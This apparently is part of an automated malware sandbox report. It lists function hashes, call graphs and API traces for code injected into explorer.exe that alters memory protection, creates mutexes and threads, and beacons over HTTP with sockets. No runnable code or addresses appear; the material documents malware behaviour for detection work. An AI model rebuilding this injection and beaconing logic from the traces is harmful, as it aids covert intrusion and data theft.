                                                                                                                              • Instruction ID: 6e365a1516011dd4eb355f1800b62eca0aefa1209352ddb0c1066284aeaee67c
                                                                                                                              • Opcode Fuzzy Hash: 038176fc7cde7e10c8d4fa12af5fba39e7c2662be990fd46971b7ebdb1d3c6f9
                                                                                                                              • Instruction Fuzzy Hash: 94318676A00619AFDF20DF2DDD40BEF77F8EB54610F44455AE949E3240EB309A448BA0
                                                                                                                              Function 01A27D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: d9169070a3625b9e75bfc46ed2c920488a4e2d5347d37ab1d6acaa8e928a51b0
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: E291C471E042369BEB24DFADC881ABEBBB5FF64320F14451AE955E72C0D7349A40CB61
                                                                                                                              Function 019E9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
                                                                                                                              • Instruction ID: 51aeb877277b1048c1c36fe62723bf87b73e5d6b131ad4c6061c7ea57d4b52c5
                                                                                                                              • Opcode Fuzzy Hash: 3cd4f904a95608ca2d9d0d3aed2ade506a3b2f8849f63df6af092e88c40faf6c
                                                                                                                              • Instruction Fuzzy Hash: C5810C75D002699BDB32CB54DD44BEAB7B8AB48754F0041DAEA1DB7280D7709E85CFA0
                                                                                                                              Function 01A6CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 01A6CFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4Qw@4Qw
                                                                                                                              • API String ID: 4062629308-2383119779
                                                                                                                              • Opcode ID: 581ca99ca79b3790f265f3b3c25911640a067bee7aa16e7bb774b92dda67ffdd
                                                                                                                              • Instruction ID: 2274a3964507609115032b7b4b4625d853e613837aac013293c2bff4c5fd4872
                                                                                                                              • Opcode Fuzzy Hash: 581ca99ca79b3790f265f3b3c25911640a067bee7aa16e7bb774b92dda67ffdd
                                                                                                                              • Instruction Fuzzy Hash: 3141E2B5E00619EFCB219FD9C940A6DBBB8FF54B50F01442EEA46DB254D774C901CB61

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.5%
                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                              Signature Coverage:11.4%
                                                                                                                              Total number of Nodes:79
                                                                                                                              Total number of Limit Nodes:9
                                                                                                                              execution_graph 20204 115d22dd 20208 115d231a 20204->20208 20205 115d23fa 20206 115d2328 SleepEx 20206->20206 20206->20208 20208->20205 20208->20206 20211 115dcf12 7 API calls 20208->20211 20212 115d3432 NtCreateFile 20208->20212 20213 115d20f2 6 API calls 20208->20213 20211->20208 20212->20208 20213->20208 20214 115debac 20215 115debb1 20214->20215 20248 115debb6 20215->20248 20249 115d4b72 20215->20249 20217 115dec2c 20218 115dec85 20217->20218 20219 115dec69 20217->20219 20220 115dec54 20217->20220 20217->20248 20263 115dcab2 NtProtectVirtualMemory 20218->20263 20224 115dec6e 20219->20224 20225 115dec80 20219->20225 20259 115dcab2 NtProtectVirtualMemory 20220->20259 20222 115dec8d 20264 115d6102 ObtainUserAgentString NtProtectVirtualMemory 20222->20264 20261 115dcab2 NtProtectVirtualMemory 20224->20261 20225->20218 20229 115dec97 20225->20229 20227 115dec5c 20260 115d5ee2 ObtainUserAgentString NtProtectVirtualMemory 20227->20260 20230 115dec9c 20229->20230 20231 115decbe 20229->20231 20253 115dcab2 NtProtectVirtualMemory 20230->20253 20235 115decd9 20231->20235 20236 115decc7 20231->20236 20231->20248 20233 115dec76 20262 115d5fc2 ObtainUserAgentString NtProtectVirtualMemory 20233->20262 20235->20248 20267 115dcab2 NtProtectVirtualMemory 20235->20267 20265 115dcab2 NtProtectVirtualMemory 20236->20265 20239 115deccf 20266 115d62f2 ObtainUserAgentString NtProtectVirtualMemory 20239->20266 20241 115decac 20254 115d5de2 ObtainUserAgentString 20241->20254 20243 115dece5 20268 115d6712 ObtainUserAgentString NtProtectVirtualMemory 20243->20268 20246 115decb4 20255 115d2412 20246->20255 20250 115d4b93 20249->20250 20251 115d4cb5 CreateMutexExW 20250->20251 20252 115d4cce 20250->20252 20251->20252 20252->20217 20253->20241 20254->20246 20256 115d2440 20255->20256 20257 115d2473 20256->20257 20258 115d244d CreateThread 20256->20258 20257->20248 20258->20248 20259->20227 20260->20248 20261->20233 20262->20248 20263->20222 20264->20248 20265->20239 20266->20248 20267->20243 20268->20248 20269 115dee12 20273 115dd942 20269->20273 20271 115dee45 NtProtectVirtualMemory 20272 115dee70 20271->20272 20274 115dd967 20273->20274 20274->20271 20275 115ddf82 20276 115ddfb8 20275->20276 20278 115de081 20276->20278 20286 115de022 20276->20286 20287 115da5b2 20276->20287 20280 115de117 getaddrinfo 20278->20280 20281 115de134 20278->20281 20278->20286 20280->20281 20285 115de1b2 20281->20285 20281->20286 20290 115da732 20281->20290 20283 115de7f4 setsockopt recv 20283->20286 20284 115de729 20284->20283 20284->20286 20285->20286 20293 115da6b2 20285->20293 20288 115da5ec 20287->20288 20289 115da60a socket 20287->20289 20288->20289 20289->20278 20291 115da788 connect 20290->20291 20292 115da76a 20290->20292 20291->20285 20292->20291 20294 115da705 send 20293->20294 20295 115da6e7 20293->20295 20294->20284 20295->20294 20296 115d88c2 20297 115d8934 20296->20297 20298 115d89a6 20297->20298 20299 115d8995 ObtainUserAgentString 20297->20299 20299->20298 20300 115dd232 20302 115dd25c 20300->20302 20303 115dd334 20300->20303 20301 115dd410 NtCreateFile 20301->20303 20302->20301 20302->20303

                                                                                                                              Executed Functions

                                                                                                                              Function 115DDF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 115ddf82-115ddfb6 1 115ddfb8-115ddfbc 0->1 2 115ddfd6-115ddfd9 0->2 1->2 3 115ddfbe-115ddfc2 1->3 4 115ddfdf-115ddfed 2->4 5 115de8fe-115de90c 2->5 3->2 6 115ddfc4-115ddfc8 3->6 7 115de8f6-115de8f7 4->7 8 115ddff3-115ddff7 4->8 6->2 9 115ddfca-115ddfce 6->9 7->5 10 115ddfff-115de000 8->10 11 115ddff9-115ddffd 8->11 9->2 12 115ddfd0-115ddfd4 9->12 13 115de00a-115de010 10->13 11->10 11->13 12->2 12->4 14 115de03a-115de060 13->14 15 115de012-115de020 13->15 16 115de068-115de07c call 115da5b2 14->16 17 115de062-115de066 14->17 15->14 18 115de022-115de026 15->18 22 115de081-115de0a2 16->22 17->16 19 115de0a8-115de0ab 17->19 18->7 21 115de02c-115de035 18->21 23 115de144-115de150 19->23 24 115de0b1-115de0b8 19->24 21->7 22->19 25 115de8ee-115de8ef 22->25 23->25 26 115de156-115de165 23->26 27 115de0ba-115de0dc call 115dd942 24->27 28 115de0e2-115de0f5 24->28 25->7 29 115de17f-115de18f 26->29 30 115de167-115de178 call 115da552 26->30 27->28 28->25 32 115de0fb-115de101 28->32 34 115de1e5-115de21b 29->34 35 115de191-115de1ad call 115da732 29->35 30->29 32->25 37 115de107-115de109 32->37 40 115de22d-115de231 34->40 41 115de21d-115de22b 34->41 43 115de1b2-115de1da 35->43 37->25 42 115de10f-115de111 37->42 45 115de247-115de24b 40->45 46 115de233-115de245 40->46 44 115de27f-115de280 41->44 42->25 47 115de117-115de132 getaddrinfo 42->47 43->34 49 115de1dc-115de1e1 43->49 48 115de283-115de2e0 call 115ded62 call 115db482 call 115dae72 call 115df002 44->48 50 115de24d-115de25f 45->50 51 115de261-115de265 45->51 46->44 47->23 52 115de134-115de13c 47->52 63 115de2f4-115de354 call 115ded92 48->63 64 115de2e2-115de2e6 48->64 49->34 50->44 53 115de26d-115de279 51->53 54 115de267-115de26b 51->54 52->23 53->44 54->48 54->53 69 115de48c-115de4b8 call 115ded62 call 115df262 63->69 70 115de35a-115de396 call 115ded62 call 115df262 call 115df002 63->70 64->63 66 115de2e8-115de2ef call 115db042 64->66 66->63 79 115de4d9-115de590 call 115df262 * 3 call 115df002 * 2 call 115db482 69->79 80 115de4ba-115de4d5 69->80 85 115de398-115de3b7 call 115df262 call 115df002 70->85 86 115de3bb-115de3e9 call 115df262 * 2 70->86 112 115de595-115de5b9 call 115df262 79->112 80->79 85->86 101 115de3eb-115de410 call 115df002 call 115df262 86->101 102 115de415-115de41d 86->102 101->102 105 115de41f-115de425 102->105 106 115de442-115de448 102->106 109 115de467-115de487 call 115df262 105->109 110 115de427-115de43d 105->110 111 115de44e-115de456 106->111 106->112 109->112 110->112 111->112 116 115de45c-115de45d 111->116 121 115de5bb-115de5cc call 115df262 call 115df002 112->121 122 115de5d1-115de6ad call 115df262 * 7 call 115df002 call 115ded62 call 115df002 call 115dae72 call 115db042 112->122 116->109 133 115de6af-115de6b3 121->133 122->133 135 115de6ff-115de72d call 115da6b2 133->135 136 115de6b5-115de6fa call 115da382 call 115da7b2 133->136 143 115de75d-115de761 135->143 144 115de72f-115de735 135->144 158 115de8e6-115de8e7 136->158 148 115de90d-115de913 143->148 149 115de767-115de76b 143->149 144->143 147 115de737-115de74c 144->147 147->143 152 115de74e-115de754 147->152 153 115de779-115de784 148->153 154 115de919-115de920 148->154 155 115de8aa-115de8df call 115da7b2 149->155 156 115de771-115de773 149->156 152->143 159 115de756 152->159 160 115de786-115de793 153->160 161 115de795-115de796 153->161 154->160 155->158 156->153 156->155 158->25 159->143 160->161 164 115de79c-115de7a0 160->164 161->164 167 115de7b1-115de7b2 164->167 168 115de7a2-115de7af 164->168 170 115de7b8-115de7c4 167->170 168->167 168->170 172 115de7f4-115de861 setsockopt recv 170->172 173 115de7c6-115de7ef call 115ded92 call 115ded62 170->173 177 115de8a3-115de8a4 172->177 178 115de863 172->178 173->172 177->155 178->177 181 115de865-115de86a 178->181 181->177 184 115de86c-115de872 181->184 184->177 186 115de874-115de8a1 184->186 186->177 186->178
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: getaddrinforecvsetsockopt
                                                                                                                              • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                              • API String ID: 1564272048-1117930895
                                                                                                                              • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                              • Instruction ID: 7d49aa0ccb485988c93e38d229dfc41809d88a0dc84ec9f7e908ebe8a2626068
                                                                                                                              • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                              • Instruction Fuzzy Hash: B4528C34618B598BDB59EF6CC8847DAB7E1FB94304F50462EC4AFC7146EE30A54ACB81
                                                                                                                              Function 115DD232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 299 115dd232-115dd256 300 115dd8bd-115dd8cd 299->300 301 115dd25c-115dd260 299->301 301->300 302 115dd266-115dd2a0 301->302 303 115dd2bf 302->303 304 115dd2a2-115dd2a6 302->304 306 115dd2c6 303->306 304->303 305 115dd2a8-115dd2ac 304->305 307 115dd2ae-115dd2b2 305->307 308 115dd2b4-115dd2b8 305->308 309 115dd2cb-115dd2cf 306->309 307->306 308->309 310 115dd2ba-115dd2bd 308->310 311 115dd2f9-115dd30b 309->311 312 115dd2d1-115dd2f7 call 115dd942 309->312 310->309 316 115dd378 311->316 317 115dd30d-115dd332 311->317 312->311 312->316 318 115dd37a-115dd3a0 316->318 319 115dd334-115dd33b 317->319 320 115dd3a1-115dd3a8 317->320 321 115dd33d-115dd360 call 115dd942 319->321 322 115dd366-115dd370 319->322 323 115dd3aa-115dd3d3 call 115dd942 320->323 324 115dd3d5-115dd3dc 320->324 321->322 322->316 326 115dd372-115dd373 322->326 323->316 323->324 328 115dd3de-115dd40a call 115dd942 324->328 329 115dd410-115dd458 NtCreateFile call 115dd172 324->329 326->316 328->316 328->329 334 115dd45d-115dd45f 329->334 334->316 336 115dd465-115dd46d 334->336 336->316 337 115dd473-115dd476 336->337 338 115dd478-115dd481 337->338 339 115dd486-115dd48d 337->339 338->318 340 115dd48f-115dd4b8 call 115dd942 339->340 341 115dd4c2-115dd4ec 339->341 340->316 348 115dd4be-115dd4bf 340->348 346 115dd8ae-115dd8b8 341->346 347 115dd4f2-115dd4f5 341->347 346->316 349 115dd4fb-115dd4fe 347->349 350 115dd604-115dd611 347->350 348->341 351 115dd55e-115dd561 349->351 352 115dd500-115dd507 349->352 350->318 357 115dd567-115dd572 351->357 358 115dd616-115dd619 351->358 354 115dd509-115dd532 call 115dd942 352->354 355 115dd538-115dd559 352->355 354->316 354->355 362 115dd5e9-115dd5fa 355->362 363 115dd574-115dd59d call 115dd942 357->363 364 115dd5a3-115dd5a6 357->364 360 115dd61f-115dd626 358->360 361 115dd6b8-115dd6bb 358->361 368 115dd628-115dd651 call 115dd942 360->368 369 115dd657-115dd66b call 115dee92 360->369 365 115dd6bd-115dd6c4 361->365 366 115dd739-115dd73c 361->366 362->350 363->316 363->364 364->316 371 115dd5ac-115dd5b6 364->371 372 115dd6f5-115dd734 365->372 373 115dd6c6-115dd6ef call 115dd942 365->373 375 115dd7c4-115dd7c7 366->375 376 115dd742-115dd749 366->376 368->316 368->369 369->316 391 115dd671-115dd6b3 369->391 371->316 379 115dd5bc-115dd5e6 371->379 396 115dd894-115dd8a9 372->396 373->346 373->372 375->316 380 115dd7cd-115dd7d4 375->380 383 115dd74b-115dd774 call 115dd942 376->383 384 115dd77a-115dd7bf 376->384 379->362 386 115dd7fc-115dd803 380->386 387 115dd7d6-115dd7f6 call 115dd942 380->387 383->346 383->384 384->396 394 115dd82b-115dd835 386->394 395 115dd805-115dd825 call 115dd942 386->395 387->386 391->318 394->346 400 115dd837-115dd83e 394->400 395->394 396->318 400->346 404 115dd840-115dd886 400->404 404->396
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID: `
                                                                                                                              • API String ID: 823142352-2679148245
                                                                                                                              • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                              • Instruction ID: 1e46f0d57f271824a419fc6caacfcc2daac33c310ac9ae34f00f1d2f378e2521
                                                                                                                              • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                              • Instruction Fuzzy Hash: 87224770A18F4A9FDB89DF6CC4956AEB7E1FB98305F41062AE45ED3290DF30A451CB81
                                                                                                                              Function 115DEE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 443 115dee12-115dee6e call 115dd942 NtProtectVirtualMemory 446 115dee7d-115dee8f 443->446 447 115dee70-115dee7c 443->447
                                                                                                                              APIs
                                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 115DEE67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706961497-0
                                                                                                                              • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                              • Instruction ID: 659770865f8a6db49ed0a73bd0715b7d755a074d2bf449b9a35c613a89b480a0
                                                                                                                              • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                              • Instruction Fuzzy Hash: E501B134628B884F8B88EF6CD48012AB7E4FBCE314F000B3EE99AC3250EB70C5414742
                                                                                                                              Function 115DEE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 448 115dee0a-115dee38 449 115dee45-115dee6e NtProtectVirtualMemory 448->449 450 115dee40 call 115dd942 448->450 451 115dee7d-115dee8f 449->451 452 115dee70-115dee7c 449->452 450->449
                                                                                                                              APIs
                                                                                                                              • NtProtectVirtualMemory.NTDLL ref: 115DEE67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706961497-0
                                                                                                                              • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                              • Instruction ID: 0b01535b553b6ce99b34156f89678ba405caf30f00bae431e6ae1cc3e68a7bae
                                                                                                                              • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                              • Instruction Fuzzy Hash: 9201A234628B884F8B48EF6C94412A6B3E5FBCE314F000B3EE99AC3241DB21D5024782
                                                                                                                              Function 115D88C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • ObtainUserAgentString.URLMON ref: 115D89A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AgentObtainStringUser
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 2681117516-319646191
                                                                                                                              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction ID: 1c9141c1e3ecbeb92d8e86ccdf7382eaacde1f0a8dcc395947068e5ee2b9738f
                                                                                                                              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                              • Instruction Fuzzy Hash: 8431C031614B0D8BCF04EFA8C8847EEB7E1FB98205F40022AD84ED7240EF749645C78A
                                                                                                                              Function 115D88BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • ObtainUserAgentString.URLMON ref: 115D89A0
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AgentObtainStringUser
                                                                                                                              • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                              • API String ID: 2681117516-319646191
                                                                                                                              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction ID: 016a0ad8bd4fa4c2556d2dae5dffcf88f384f2bb525bce78f5ebc92310c57b2f
                                                                                                                              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                              • Instruction Fuzzy Hash: 9E219170614B5D8ACF05EFACC8847EEBBA1FF98209F40422AD45AD7240EF749645C78A
                                                                                                                              Function 115D4B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateMutex
                                                                                                                              • String ID: .dll$el32$kern
                                                                                                                              • API String ID: 1964310414-1222553051
                                                                                                                              • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                              • Instruction ID: 7c9b4e47a7e3d1025491eb4384c92d2461a26d5d5240b44eed665b6b12d544c3
                                                                                                                              • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                              • Instruction Fuzzy Hash: FD415B74918A088FDF44EFA8C4957ED7BE0FFA8304F00457AC84ADB665DE309945CB85
                                                                                                                              Function 115D4B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateMutex
                                                                                                                              • String ID: .dll$el32$kern
                                                                                                                              • API String ID: 1964310414-1222553051
                                                                                                                              • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                              • Instruction ID: ebed484284c00eeda72d88daa0930492d23286d54e2335abcfd5e461451b9b17
                                                                                                                              • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                              • Instruction Fuzzy Hash: F6413A74918A088FDF84EFA8C499BED77E1FFA8304F44416AC84ADB255DE309945CB85
                                                                                                                              Function 115DA72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 289 115da72e-115da768 290 115da788-115da7ab connect 289->290 291 115da76a-115da782 call 115dd942 289->291 291->290
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: connect
                                                                                                                              • String ID: conn$ect
                                                                                                                              • API String ID: 1959786783-716201944
                                                                                                                              • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                              • Instruction ID: ea282037e5a3bf9bc6daf3847e4660a530f13a91cd8db0818c0cfb842d1051c8
                                                                                                                              • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                              • Instruction Fuzzy Hash: C3011E74618B188FCB84EF5CE088B55B7E0FB99314F1545AED90DCB266C774D9818BC2
                                                                                                                              Function 115DA732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 294 115da732-115da768 295 115da788-115da7ab connect 294->295 296 115da76a-115da782 call 115dd942 294->296 296->295
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: connect
                                                                                                                              • String ID: conn$ect
                                                                                                                              • API String ID: 1959786783-716201944
                                                                                                                              • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                              • Instruction ID: 2f359639e7dcc075c9c44bbddc3f8e2585c8db99e23be971cb5a76d3141a4b22
                                                                                                                              • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                              • Instruction Fuzzy Hash: 25012C70618A1C8FCB84EF5CE088B55B7E0FB99314F1541AEA80DCB266CB74D9818BC2
                                                                                                                              Function 115DA6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 407 115da6b2-115da6e5 408 115da705-115da72d send 407->408 409 115da6e7-115da6ff call 115dd942 407->409 409->408
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.4011430051.00000000115A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 115A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_115a0000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: send
                                                                                                                              • String ID: send
                                                                                                                              • API String ID: 2809346765-2809346765
                                                                                                                              • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                              • Instruction ID: e0df41e250b49f9024e6b5e04a1c57c5a5d232b8134d1f49e8f16c89ff717b5f
                                                                                                                              • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                              • Instruction Fuzzy Hash: 26012570518A1D8FDBC4DF5CD048B2577E0FB98314F1645AED85DCB266C670D881CB85
                                                                                                                              Function 115DA5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
